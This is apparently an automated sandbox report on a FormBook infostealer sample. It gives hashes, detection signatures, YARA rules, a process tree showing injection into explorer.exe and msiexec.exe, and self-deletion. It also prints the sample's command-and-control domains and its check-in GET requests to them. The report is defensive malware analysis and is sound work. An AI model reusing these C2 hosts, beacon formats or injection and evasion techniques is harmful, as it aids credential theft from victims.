
Analysis Report RCS76393.exe

Overview

General Information

Sample Name: RCS76393.exe
Analysis ID: 383936
MD5: 1ab1c3129fa0764ea0702da70f3ef569
SHA1: ee8cd1946b58390f4599056df1472d01cf85a543
SHA256: 5d1870672eff4e2ec6d699d654d5268051f7a56f8ca991fefa538eeef380a89c
Tags: Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • RCS76393.exe (PID: 6500 cmdline: 'C:\Users\user\Desktop\RCS76393.exe' MD5: 1AB1C3129FA0764EA0702DA70F3EF569)
    • RCS76393.exe (PID: 6544 cmdline: 'C:\Users\user\Desktop\RCS76393.exe' MD5: 1AB1C3129FA0764EA0702DA70F3EF569)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 6760 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 6848 cmdline: /c del 'C:\Users\user\Desktop\RCS76393.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      3.1.RCS76393.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        3.1.RCS76393.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.1.RCS76393.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        3.2.RCS76393.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          3.2.RCS76393.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          AV Detection:

          Antivirus detection for URL or domain
          Source: www.batiktintaemas.com/goei/, Avira URL Cloud: Label: malware
          Found malware configuration
          Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, Malware Configuration Extractor: FormBook
          Yara detected FormBook
          Source: Yara match, File source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 3.1.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.1.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sample
          Source: RCS76393.exe, Joe Sandbox ML: detected
          Source: 3.1.RCS76393.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.RCS76393.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: RCS76393.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: Binary string: msiexec.pdb source: RCS76393.exe, 00000003.00000002.363009374.0000000000D80000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.348166321.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: msiexec.pdbGCTL source: RCS76393.exe, 00000003.00000002.363009374.0000000000D80000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RCS76393.exe, 00000003.00000002.362641926.0000000000AEF000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RCS76393.exe, msiexec.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.348166321.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\RCS76393.exe, Code function: 4x nop then pop edi, 3_2_0040C326
          Source: C:\Users\user\Desktop\RCS76393.exe, Code function: 4x nop then pop edi, 3_1_0040C326
          Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 4x nop then pop edi, 7_2_030AC326

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49741 -> 198.185.159.144:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49741 -> 198.185.159.144:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49741 -> 198.185.159.144:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.batiktintaemas.com/goei/
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exe, DNS query: www.addthat.xyz
          Source: C:\Windows\explorer.exe, DNS query: www.evecrude.xyz
          Source: global traffic, HTTP traffic detected: GET /goei/?EzuXh6BP=B46qr3zTyBR1t+VKbrees7UR/FiD4WL3nz1lGh06nIBkEBDQrNA0bRgDDyF1Au9+nA9wWbL6eg==&RL0=rVvxj02xpd_lyz HTTP/1.1, Host: www.ly-iot.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /goei/?EzuXh6BP=GY2gQUF0Rr/aPbkdLLDyshZLrmGphrTrFvzfodUnQAaoW3qjeuccMn3ranK+t6GyiOOsZqKqHA==&RL0=rVvxj02xpd_lyz HTTP/1.1, Host: www.ronwongart.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /goei/?EzuXh6BP=TTuxDc9EejbduYk8ZHEjlKcpN/O2EpBILXUKac8y6lhY4fajDGEqKXEgdN9L03N9MJzUHOy50w==&RL0=rVvxj02xpd_lyz HTTP/1.1, Host: www.pimpmyrecipe.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /goei/?EzuXh6BP=BdWs9+XwUamw8CUuz3E8yrboev7iCL3gb6z7OkS86X4CeTXY3ejv3dXKop2WOnP3DDbLLyGv2A==&RL0=rVvxj02xpd_lyz HTTP/1.1, Host: www.foodsystemsjusticeproject.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /goei/?EzuXh6BP=iESvN3vx+46BgVwWtoPvPQmUnTMTtp1hHS9L6erIUoS4dJlpb0oL7GpX49j9BG002Zkja/L0IA==&RL0=rVvxj02xpd_lyz HTTP/1.1, Host: www.batiktintaemas.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /goei/?EzuXh6BP=WHzdRAWCNmljEZUdYknMeV5zI3m+uLt35kXWxc+UN/aPGTi9DTFvtLFMQ5OC8xESdqE/mkifJw==&RL0=rVvxj02xpd_lyz HTTP/1.1, Host: www.addthat.xyz, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /goei/?EzuXh6BP=1hbvBZ6scGrlPy0N1riO1jCdFmqX21DbBNOeXEZPJTZAL1bLTprMXMNvQ4/+FZIG6w0HvwIWjw==&RL0=rVvxj02xpd_lyz HTTP/1.1, Host: www.evecrude.xyz, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
          Source: Joe Sandbox View, IP Address: 199.59.242.153 199.59.242.153
          Source: Joe Sandbox View, ASN Name: IOFLOODUS IOFLOODUS
          Source: Joe Sandbox View, ASN Name: MISSDOMAINSE MISSDOMAINSE
          Source: Joe Sandbox View, ASN Name: BODIS-NJUS BODIS-NJUS
          Source: unknown, DNS traffic detected: queries for: www.ly-iot.com
          Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found, Content-Type: text/html, Server: Microsoft-IIS/10.0, X-Powered-By: ASP.NET, Date: Thu, 08 Apr 2021 10:47:16 GMT, Connection: close, Content-Length: 1245

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match, File source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 3.1.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.1.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 3.1.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 3.2.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 3.1.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 3.2.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\RCS76393.exe, Code function: 3_2_004181C0 NtCreateFile, 3_2_004181C0
          Source: C:\Users\user\Desktop\RCS76393.exe, Code function: 3_2_00418270 NtReadFile, 3_2_00418270
          Source: C:\Users\user\Desktop\RCS76393.exe, Code function: 3_2_004182F0 NtClose, 3_2_004182F0
          Source: C:\Users\user\Desktop\RCS76393.exe, Code function: 3_2_004183A0 NtAllocateVirtualMemory, 3_2_004183A0
          Source: C:\Users\user\Desktop\RCS76393.exe, Code function: 3_2_0041826B NtReadFile, 3_2_0041826B
          Source: C:\Users\user\Desktop\RCS76393.exe, Code function: 3_2_0041839A NtAllocateVirtualMemory, 3_2_0041839A
          Source: C:\Users\user\Desktop\RCS76393.exe, Code function: 3_2_00A398F0 NtReadVirtualMemory, LdrInitializeThunk, 3_2_00A398F0
          Source: C:\Users\user\Desktop\RCS76393.exe, Code function: 3_2_00A39860 NtQuerySystemInformation, LdrInitializeThunk, 3_2_00A39860
          Source: C:\Users\user\Desktop\RCS76393.exe, Code function: 3_2_00A39840 NtDelayExecution, LdrInitializeThunk, 3_2_00A39840
          Source: C:\Users\user\Desktop\RCS76393.exe, Code function: 3_2_00A399A0 NtCreateSection, LdrInitializeThunk, 3_2_00A399A0
          Source: C:\Users\user\Desktop\RCS76393.exe, Code function: 3_2_00A39910 NtAdjustPrivilegesToken, LdrInitializeThunk, 3_2_00A39910
          Source: C:\Users\user\Desktop\RCS76393.exe, Code function: 3_2_00A39A20 NtResumeThread, LdrInitializeThunk, 3_2_00A39A20
          Source: C:\Users\user\Desktop\RCS76393.exe, Code function: 3_2_00A39A00 NtProtectVirtualMemory, LdrInitializeThunk, 3_2_00A39A00
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39A50 NtCreateFile,LdrInitializeThunk,3_2_00A39A50
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A395D0 NtClose,LdrInitializeThunk,3_2_00A395D0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39540 NtReadFile,LdrInitializeThunk,3_2_00A39540
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A396E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_00A396E0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_00A39660
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A397A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_00A397A0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39780 NtMapViewOfSection,LdrInitializeThunk,3_2_00A39780
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39FE0 NtCreateMutant,LdrInitializeThunk,3_2_00A39FE0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39710 NtQueryInformationToken,LdrInitializeThunk,3_2_00A39710
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A398A0 NtWriteVirtualMemory,3_2_00A398A0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39820 NtEnumerateKey,3_2_00A39820
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A3B040 NtSuspendThread,3_2_00A3B040
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A399D0 NtCreateProcessEx,3_2_00A399D0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39950 NtQueueApcThread,3_2_00A39950
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39A80 NtOpenDirectoryObject,3_2_00A39A80
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39A10 NtQuerySection,3_2_00A39A10
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A3A3B0 NtGetContextThread,3_2_00A3A3B0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39B00 NtSetValueKey,3_2_00A39B00
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A395F0 NtQueryInformationFile,3_2_00A395F0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39520 NtWaitForSingleObject,3_2_00A39520
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A3AD30 NtSetContextThread,3_2_00A3AD30
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39560 NtWriteFile,3_2_00A39560
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A396D0 NtCreateKey,3_2_00A396D0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39610 NtEnumerateValueKey,3_2_00A39610
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39670 NtQueryInformationProcess,3_2_00A39670
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39650 NtQueryValueKey,3_2_00A39650
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39730 NtQueryVirtualMemory,3_2_00A39730
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A3A710 NtOpenProcessToken,3_2_00A3A710
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39760 NtOpenProcess,3_2_00A39760
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39770 NtSetInformationFile,3_2_00A39770
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A3A770 NtOpenThread,3_2_00A3A770
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_004181C0 NtCreateFile,3_1_004181C0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_00418270 NtReadFile,3_1_00418270
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_004182F0 NtClose,3_1_004182F0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_004183A0 NtAllocateVirtualMemory,3_1_004183A0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_0041826B NtReadFile,3_1_0041826B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9540 NtReadFile,LdrInitializeThunk,7_2_045C9540
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C95D0 NtClose,LdrInitializeThunk,7_2_045C95D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9650 NtQueryValueKey,LdrInitializeThunk,7_2_045C9650
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_045C9660
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C96D0 NtCreateKey,LdrInitializeThunk,7_2_045C96D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C96E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_045C96E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9710 NtQueryInformationToken,LdrInitializeThunk,7_2_045C9710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9FE0 NtCreateMutant,LdrInitializeThunk,7_2_045C9FE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9780 NtMapViewOfSection,LdrInitializeThunk,7_2_045C9780
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9840 NtDelayExecution,LdrInitializeThunk,7_2_045C9840
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9860 NtQuerySystemInformation,LdrInitializeThunk,7_2_045C9860
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_045C9910
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C99A0 NtCreateSection,LdrInitializeThunk,7_2_045C99A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9A50 NtCreateFile,LdrInitializeThunk,7_2_045C9A50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9560 NtWriteFile,7_2_045C9560
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045CAD30 NtSetContextThread,7_2_045CAD30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9520 NtWaitForSingleObject,7_2_045C9520
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C95F0 NtQueryInformationFile,7_2_045C95F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9670 NtQueryInformationProcess,7_2_045C9670
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9610 NtEnumerateValueKey,7_2_045C9610
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045CA770 NtOpenThread,7_2_045CA770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9770 NtSetInformationFile,7_2_045C9770
